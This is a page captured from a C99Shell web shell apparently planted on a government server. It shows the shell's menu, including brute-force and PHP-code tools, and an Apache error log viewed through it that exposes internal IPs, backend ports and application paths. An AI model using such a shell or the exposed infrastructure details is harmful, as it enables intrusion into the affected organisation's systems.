!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     error.2016.06.20.log (33.68 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
[Mon Jun 20 01:27:20.821607 2016] [cgi:error] [pid 15364:tid 14476] [client 115.230.125.146:2448] script not found or unable to stat: E:/nuevo/cgi-bin/common
[Mon Jun 20 02:21:26.439508 2016] [mpm_winnt:warn] [pid 15364:tid 17052] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 20 04:11:04.536262 2016] [proxy:error] [pid 15364:tid 15792] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Mon Jun 20 04:11:04.536262 2016] [proxy:error] [pid 15364:tid 15792] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Mon Jun 20 04:11:04.536262 2016] [proxy_http:error] [pid 15364:tid 15792] [client 152.61.128.50:40895] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Mon Jun 20 04:11:04.754662 2016] [proxy:error] [pid 15364:tid 15792] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Jun 20 04:18:57.825493 2016] [proxy:error] [pid 15364:tid 15180] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Mon Jun 20 04:18:57.825493 2016] [proxy:error] [pid 15364:tid 15180] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Mon Jun 20 04:18:57.825493 2016] [proxy_http:error] [pid 15364:tid 15180] [client 152.61.128.50:52199] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Mon Jun 20 04:18:58.043894 2016] [proxy:error] [pid 15364:tid 15180] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Jun 20 04:18:58.277894 2016] [proxy:error] [pid 15364:tid 15180] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Jun 20 05:52:47.237781 2016] [proxy:error] [pid 15364:tid 15844] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Mon Jun 20 05:52:47.237781 2016] [proxy:error] [pid 15364:tid 15844] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Mon Jun 20 05:52:47.237781 2016] [proxy_http:error] [pid 15364:tid 15844] [client 152.61.192.232:3331] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Mon Jun 20 05:52:47.471781 2016] [proxy:error] [pid 15364:tid 15844] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Jun 20 05:52:47.705782 2016] [proxy:error] [pid 15364:tid 15844] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Jun 20 06:25:16.274004 2016] [mpm_winnt:warn] [pid 15364:tid 17052] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 20 06:48:20.574636 2016] [proxy:error] [pid 15364:tid 15792] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Mon Jun 20 06:48:20.574636 2016] [proxy:error] [pid 15364:tid 15792] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Mon Jun 20 06:48:20.574636 2016] [proxy_http:error] [pid 15364:tid 15792] [client 152.61.192.232:57335] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Mon Jun 20 06:48:20.808636 2016] [proxy:error] [pid 15364:tid 15792] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Jun 20 07:13:49.767322 2016] [core:error] [pid 15364:tid 15632] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.97:25584] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Jun 20 07:20:47.380055 2016] [proxy_http:error] [pid 15364:tid 13968] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:28638] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://www.ambientebogota.gov.co/web/intranet/aplicaciones-para-acceder-fuera-de-la-sda
[Mon Jun 20 07:20:47.380055 2016] [proxy:error] [pid 15364:tid 13968] [client 201.245.192.253:28638] AH00898: Error reading from remote server returned by /isolucionsda/, referer: http://www.ambientebogota.gov.co/web/intranet/aplicaciones-para-acceder-fuera-de-la-sda
[Mon Jun 20 07:37:31.024418 2016] [mpm_winnt:warn] [pid 15364:tid 17052] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 20 07:45:36.466071 2016] [proxy_http:error] [pid 15364:tid 15300] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:46110] AH01102: error reading status line from remote server 172.22.1.31:80
[Mon Jun 20 07:45:36.466071 2016] [proxy:error] [pid 15364:tid 15300] [client 201.245.192.253:46110] AH00898: Error reading from remote server returned by /isolucionsda/ControlDeInicio.asp
[Mon Jun 20 07:57:58.372174 2016] [proxy_http:error] [pid 15364:tid 14548] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:40875] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FramesetArticulo.asp?Pagina=BancoConocimiento%2FA%2FActadevisitamineria%5Fv6%2FActadevisitamineria%5Fv6%2Easp&IdArticulo=5259
[Mon Jun 20 07:57:58.372174 2016] [proxy:error] [pid 15364:tid 14548] [client 201.245.192.253:40875] AH00898: Error reading from remote server returned by /IsolucionSDA/BancoConocimiento/A/Actadevisitamineria_v6/Actadevisitamineria_v6.asp, referer: http://190.27.245.106/IsolucionSDA/FramesetArticulo.asp?Pagina=BancoConocimiento%2FA%2FActadevisitamineria%5Fv6%2FActadevisitamineria%5Fv6%2Easp&IdArticulo=5259
[Mon Jun 20 07:59:51.768773 2016] [proxy_http:error] [pid 15364:tid 15660] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:42112] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/IdentificaUsuario.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jun 20 07:59:51.768773 2016] [proxy:error] [pid 15364:tid 15660] [client 201.245.192.253:42112] AH00898: Error reading from remote server returned by /isolucionsda/g/Img_LogoIsoCabezote.jpg, referer: http://190.27.245.106/isolucionsda/IdentificaUsuario.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jun 20 08:00:54.137682 2016] [core:error] [pid 15364:tid 14516] (20024)The given path is misformatted or contained invalid characters: [client 190.26.192.250:55698] AH00127: Cannot map GET /BLA/boletinlegal/norma_menu.phphttp://190.27.245.106/BLA/boletinlegal/norma_menu.php HTTP/1.1 to file
[Mon Jun 20 08:15:14.588394 2016] [proxy_http:error] [pid 15364:tid 15792] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:58333] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jun 20 08:15:14.588394 2016] [proxy:error] [pid 15364:tid 15792] [client 201.245.192.253:58333] AH00898: Error reading from remote server returned by /IsolucionSDA/BarraFavoritos.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jun 20 09:04:41.777005 2016] [proxy_http:error] [pid 15364:tid 14552] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:25362] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jun 20 09:05:51.914729 2016] [proxy_http:error] [pid 15364:tid 14200] (20014)Internal error: [client 201.245.192.253:44416] AH01102: error reading status line from remote server 172.22.1.43:80, referer: http://190.27.245.106/desprendiblespago/controlador
[Mon Jun 20 09:31:50.779667 2016] [core:error] [pid 15364:tid 15824] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.27:1258] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Jun 20 09:49:19.600709 2016] [proxy_http:error] [pid 15364:tid 15856] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:36720] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Mon Jun 20 09:49:20.926711 2016] [proxy_http:error] [pid 15364:tid 14716] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:36718] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=ListadoMaestroDocumentos3.asp
[Mon Jun 20 09:59:32.822186 2016] [mpm_winnt:warn] [pid 15364:tid 17052] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 20 12:31:07.422760 2016] [mpm_winnt:warn] [pid 15364:tid 17052] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 20 12:31:07.422760 2016] [mpm_winnt:warn] [pid 15364:tid 17052] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 20 12:40:07.807709 2016] [mpm_winnt:warn] [pid 15364:tid 17052] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 20 13:05:47.422213 2016] [core:error] [pid 15364:tid 16092] (20024)The given path is misformatted or contained invalid characters: [client 65.208.151.112:54375] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file, referer: http://www.dama.gov.co/
[Mon Jun 20 13:15:37.961250 2016] [mpm_winnt:warn] [pid 15364:tid 17052] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 20 13:43:34.090594 2016] [proxy_http:error] [pid 15364:tid 14924] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:39146] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/bancoconocimiento/G/GESTIONJURIDICA_v6/GESTIONJURIDICA_v6.asp?IdArticulo=6837
[Mon Jun 20 13:45:14.554771 2016] [cgi:error] [pid 15364:tid 15632] [client 115.230.125.146:1974] script not found or unable to stat: E:/nuevo/cgi-bin/common
[Mon Jun 20 14:47:20.372715 2016] [proxy_http:error] [pid 15364:tid 15936] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:35593] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Mon Jun 20 14:53:16.740741 2016] [mpm_winnt:warn] [pid 15364:tid 17052] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jun 20 15:14:35.646587 2016] [proxy:error] [pid 15364:tid 13960] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 192.168.175.30:80 (192.168.175.30) failed
[Mon Jun 20 15:14:35.646587 2016] [proxy:error] [pid 15364:tid 13960] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.30) for 60s
[Mon Jun 20 15:14:35.646587 2016] [proxy_http:error] [pid 15364:tid 13960] [client 65.208.151.117:5673] AH01114: HTTP: failed to make connection to backend: 192.168.175.30, referer: http://www.dama.gov.co/catalogoisis/
[Mon Jun 20 15:15:02.447434 2016] [proxy:error] [pid 15364:tid 15028] AH00940: HTTP: disabled connection for (192.168.175.30)
[Mon Jun 20 15:15:30.745884 2016] [proxy:error] [pid 15364:tid 14412] AH00940: HTTP: disabled connection for (192.168.175.30)
[Mon Jun 20 15:16:26.812382 2016] [proxy:error] [pid 15364:tid 15856] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 192.168.175.30:80 (192.168.175.30) failed
[Mon Jun 20 15:16:26.812382 2016] [proxy:error] [pid 15364:tid 15856] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.30) for 60s
[Mon Jun 20 15:16:26.812382 2016] [proxy_http:error] [pid 15364:tid 15856] [client 65.208.151.116:55500] AH01114: HTTP: failed to make connection to backend: 192.168.175.30, referer: http://www.dama.gov.co/catalogoisis/
[Mon Jun 20 15:16:36.827600 2016] [proxy:error] [pid 15364:tid 14952] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Mon Jun 20 15:16:36.827600 2016] [proxy:error] [pid 15364:tid 14952] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Mon Jun 20 15:16:36.827600 2016] [proxy_http:error] [pid 15364:tid 14952] [client 68.180.231.36:43618] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Mon Jun 20 15:16:47.279618 2016] [proxy:error] [pid 15364:tid 16060] AH00940: HTTP: disabled connection for (192.168.175.30)
[Mon Jun 20 15:17:02.474045 2016] [proxy:error] [pid 15364:tid 14968] AH00940: HTTP: disabled connection for (192.168.175.30)
[Mon Jun 20 15:17:25.952086 2016] [proxy:error] [pid 15364:tid 14968] AH00940: HTTP: disabled connection for (192.168.175.30)
[Mon Jun 20 15:18:03.438952 2016] [proxy:error] [pid 15364:tid 15212] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 192.168.175.30:80 (192.168.175.30) failed
[Mon Jun 20 15:18:03.438952 2016] [proxy:error] [pid 15364:tid 15212] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.30) for 60s
[Mon Jun 20 15:18:03.438952 2016] [proxy_http:error] [pid 15364:tid 15212] [client 65.208.151.113:59057] AH01114: HTTP: failed to make connection to backend: 192.168.175.30, referer: http://www.dama.gov.co/catalogoisis/
[Mon Jun 20 15:18:38.866614 2016] [proxy:error] [pid 15364:tid 15008] AH00940: HTTP: disabled connection for (192.168.175.30)
[Mon Jun 20 15:18:51.424636 2016] [proxy:error] [pid 15364:tid 15520] AH00940: HTTP: disabled connection for (192.168.175.30)
[Mon Jun 20 15:19:39.035920 2016] [proxy:error] [pid 15364:tid 14208] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 192.168.175.30:80 (192.168.175.30) failed
[Mon Jun 20 15:19:39.035920 2016] [proxy:error] [pid 15364:tid 14208] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.30) for 60s
[Mon Jun 20 15:19:39.035920 2016] [proxy_http:error] [pid 15364:tid 14208] [client 65.208.151.115:26544] AH01114: HTTP: failed to make connection to backend: 192.168.175.30, referer: http://www.dama.gov.co/catalogoisis/
[Mon Jun 20 15:20:24.260399 2016] [proxy:error] [pid 15364:tid 15960] AH00940: HTTP: disabled connection for (192.168.175.30)
[Mon Jun 20 15:20:38.955625 2016] [proxy:error] [pid 15364:tid 15028] AH00940: HTTP: disabled connection for (192.168.175.30)
[Mon Jun 20 15:21:26.598109 2016] [proxy:error] [pid 15364:tid 15960] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 192.168.175.30:80 (192.168.175.30) failed
[Mon Jun 20 15:21:26.598109 2016] [proxy:error] [pid 15364:tid 15960] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.30) for 60s
[Mon Jun 20 15:21:26.598109 2016] [proxy_http:error] [pid 15364:tid 15960] [client 65.208.151.116:13299] AH01114: HTTP: failed to make connection to backend: 192.168.175.30, referer: http://www.dama.gov.co/catalogoisis/
[Mon Jun 20 15:21:35.630525 2016] [proxy:error] [pid 15364:tid 14952] AH00940: HTTP: disabled connection for (192.168.175.30)
[Mon Jun 20 15:22:01.432970 2016] [proxy:error] [pid 15364:tid 14548] AH00940: HTTP: disabled connection for (192.168.175.30)
[Mon Jun 20 15:22:21.681806 2016] [proxy:error] [pid 15364:tid 15212] AH00940: HTTP: disabled connection for (192.168.175.30)
[Mon Jun 20 15:23:10.525492 2016] [proxy:error] [pid 15364:tid 15212] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 192.168.175.30:80 (192.168.175.30) failed
[Mon Jun 20 15:23:10.525492 2016] [proxy:error] [pid 15364:tid 15212] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.30) for 60s
[Mon Jun 20 15:23:10.525492 2016] [proxy_http:error] [pid 15364:tid 15212] [client 65.208.151.118:35488] AH01114: HTTP: failed to make connection to backend: 192.168.175.30, referer: http://www.dama.gov.co/catalogoisis/
[Mon Jun 20 15:23:39.323142 2016] [proxy:error] [pid 15364:tid 15856] AH00940: HTTP: disabled connection for (192.168.175.30)
[Mon Jun 20 15:23:54.533169 2016] [proxy:error] [pid 15364:tid 15824] AH00940: HTTP: disabled connection for (192.168.175.30)
[Mon Jun 20 15:27:21.498732 2016] [proxy_http:error] [pid 15364:tid 15676] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:51043] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=BancoConocimiento/M/MECINuevo/MECINuevo.asp&IdModulo=16
[Mon Jun 20 15:34:27.301480 2016] [proxy:error] [pid 15364:tid 15448] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Mon Jun 20 15:34:27.301480 2016] [proxy:error] [pid 15364:tid 15448] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Mon Jun 20 15:34:27.301480 2016] [proxy_http:error] [pid 15364:tid 15448] [client 66.249.64.96:39329] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Mon Jun 20 16:02:00.936585 2016] [proxy:error] [pid 15364:tid 15792] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Mon Jun 20 16:02:00.936585 2016] [proxy:error] [pid 15364:tid 15792] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Mon Jun 20 16:02:00.936585 2016] [proxy_http:error] [pid 15364:tid 15792] [client 152.61.128.50:34918] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Mon Jun 20 16:02:01.232985 2016] [proxy:error] [pid 15364:tid 14200] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Jun 20 16:03:37.001553 2016] [core:error] [pid 15364:tid 15936] (20024)The given path is misformatted or contained invalid characters: [client 66.249.64.243:64974] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Jun 20 16:07:03.795517 2016] [proxy:error] [pid 15364:tid 15844] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Mon Jun 20 16:07:03.795517 2016] [proxy:error] [pid 15364:tid 15844] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Mon Jun 20 16:07:03.795517 2016] [proxy_http:error] [pid 15364:tid 15844] [client 152.61.128.50:43780] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Mon Jun 20 16:07:04.091917 2016] [proxy:error] [pid 15364:tid 15844] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Jun 20 16:07:04.403918 2016] [proxy:error] [pid 15364:tid 15844] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Jun 20 16:30:57.282034 2016] [proxy_http:error] [pid 15364:tid 14412] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 179.51.109.4:64301] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Mon Jun 20 16:31:01.150841 2016] [proxy_http:error] [pid 15364:tid 13960] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 179.51.109.4:64308] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=5
[Mon Jun 20 17:35:43.360060 2016] [proxy:error] [pid 15364:tid 14660] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Mon Jun 20 17:35:43.360060 2016] [proxy:error] [pid 15364:tid 14660] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Mon Jun 20 17:35:43.360060 2016] [proxy_http:error] [pid 15364:tid 14660] [client 152.61.192.232:56215] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Mon Jun 20 17:35:43.640861 2016] [proxy:error] [pid 15364:tid 14660] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Jun 20 17:35:43.952861 2016] [proxy:error] [pid 15364:tid 14660] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Jun 20 17:55:24.391334 2016] [proxy_http:error] [pid 15364:tid 15588] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.84.196.182:49905] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FramesetArticulo.asp?Pagina=bancoconocimiento%2FC%2FCDO%2DAutodeaperturadeindagacionpreliminarindicado%2FCDO%2DAutodeaperturadeindagacionpreliminarindicado%2Easp&IdArticulo=5914&Codigo=&Fecha=&Version=&Procedimiento=&cliente=
[Mon Jun 20 18:22:25.639782 2016] [proxy_http:error] [pid 15364:tid 15344] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.84.196.182:50837] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FramesetArticulo.asp?Pagina=bancoconocimiento%2FC%2FCDO%2DAutodeaperturadeinvestigaciondisciplinaria%2FCDO%2DAutodeaperturadeinvestigaciondisciplinaria%2Easp&IdArticulo=5902&Codigo=&Fecha=&Version=&Procedimiento=&cliente=
[Mon Jun 20 18:22:25.639782 2016] [proxy:error] [pid 15364:tid 15344] [client 186.84.196.182:50837] AH00898: Error reading from remote server returned by /isolucionsda/bancoconocimiento/C/CDO-Autodeaperturadeinvestigaciondisciplinaria/CDO-Autodeaperturadeinvestigaciondisciplinaria.asp, referer: http://190.27.245.106/isolucionsda/FramesetArticulo.asp?Pagina=bancoconocimiento%2FC%2FCDO%2DAutodeaperturadeinvestigaciondisciplinaria%2FCDO%2DAutodeaperturadeinvestigaciondisciplinaria%2Easp&IdArticulo=5902&Codigo=&Fecha=&Version=&Procedimiento=&cliente=
[Mon Jun 20 18:26:50.247447 2016] [proxy:error] [pid 15364:tid 14364] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Mon Jun 20 18:26:50.247447 2016] [proxy:error] [pid 15364:tid 14364] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Mon Jun 20 18:26:50.247447 2016] [proxy_http:error] [pid 15364:tid 14364] [client 152.61.192.232:9255] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Mon Jun 20 18:26:50.497047 2016] [proxy:error] [pid 15364:tid 14364] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Jun 20 19:23:13.692590 2016] [proxy_http:error] [pid 15364:tid 15576] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:14576] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jun 20 19:23:13.692590 2016] [proxy:error] [pid 15364:tid 15576] [client 201.245.192.253:14576] AH00898: Error reading from remote server returned by /IsolucionSDA/MagazinHome.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jun 20 19:25:30.411230 2016] [proxy_http:error] [pid 15364:tid 15448] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:14774] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=5
[Mon Jun 20 19:25:30.411230 2016] [proxy:error] [pid 15364:tid 15448] [client 201.245.192.253:14774] AH00898: Error reading from remote server returned by /IsolucionSDA/BarraFavoritos.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=5
[Mon Jun 20 19:32:39.302783 2016] [proxy_http:error] [pid 15364:tid 14764] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:15304] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/IndicadoresBase.asp?ind=355
[Mon Jun 20 19:32:39.302783 2016] [proxy:error] [pid 15364:tid 14764] [client 201.245.192.253:15304] AH00898: Error reading from remote server returned by /IsolucionSDA/Pics/Pics107144738473143PM.jpg, referer: http://190.27.245.106/IsolucionSDA/IndicadoresBase.asp?ind=355
[Mon Jun 20 20:46:24.017555 2016] [proxy_http:error] [pid 15364:tid 15148] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.84.196.182:53415] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jun 20 20:46:24.017555 2016] [proxy:error] [pid 15364:tid 15148] [client 186.84.196.182:53415] AH00898: Error reading from remote server returned by /IsolucionSDA/MagazinHome.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jun 20 21:02:46.803681 2016] [proxy_http:error] [pid 15364:tid 16160] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:20238] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jun 20 21:02:46.803681 2016] [proxy:error] [pid 15364:tid 16160] [client 201.245.192.253:20238] AH00898: Error reading from remote server returned by /IsolucionSDA/BarraFavoritos.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jun 20 21:02:48.410484 2016] [proxy_http:error] [pid 15364:tid 15540] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:20239] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=5
[Mon Jun 20 21:02:48.410484 2016] [proxy:error] [pid 15364:tid 15540] [client 201.245.192.253:20239] AH00898: Error reading from remote server returned by /IsolucionSDA/Menu.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=5
[Mon Jun 20 21:02:48.426084 2016] [proxy_http:error] [pid 15364:tid 16200] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:20240] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=5
[Mon Jun 20 21:02:48.426084 2016] [proxy:error] [pid 15364:tid 16200] [client 201.245.192.253:20240] AH00898: Error reading from remote server returned by /IsolucionSDA/BarraFavoritos.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=5
[Mon Jun 20 21:13:55.172255 2016] [proxy_http:error] [pid 15364:tid 16160] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:20757] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=5
